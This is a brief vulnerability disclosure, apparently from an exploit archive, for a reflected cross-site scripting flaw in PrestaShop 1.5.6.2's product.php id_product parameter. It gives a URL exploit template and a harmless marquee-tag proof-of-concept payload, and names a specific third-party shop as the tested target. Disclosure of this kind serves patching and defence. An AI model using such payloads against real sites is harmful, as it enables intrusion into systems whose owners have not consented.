PrestaShop version 1.5.6.2 suffers from a cross site scripting vulnerability.
a714c52feffde30ef61bd922b3d4fe052b8aff802397ee53a6e5999e0a7e5303
# Cross Site Scripting on E-Commerce PrestaShop
# Risk: Low
# CWE number: CWE-79
# Date: 09/04/2014
# Vendor: www.prestashop.com
# Version: PrestaShop 1.5.6.2
# Author: Felipe "Renzi" Gabriel
# Contact: renzi@linuxmail.org
# Tested on Windows 8 pro
# Vulnerable File: product.php
# Exploit: http:/host//product.php%3fid_product=[xss]
# PoC:
- Target: www.serviezenenmeer.nl
- Vuln. File: product.php%3fid_product=
- Exploit: "><marquee>Vulnerable</marquee>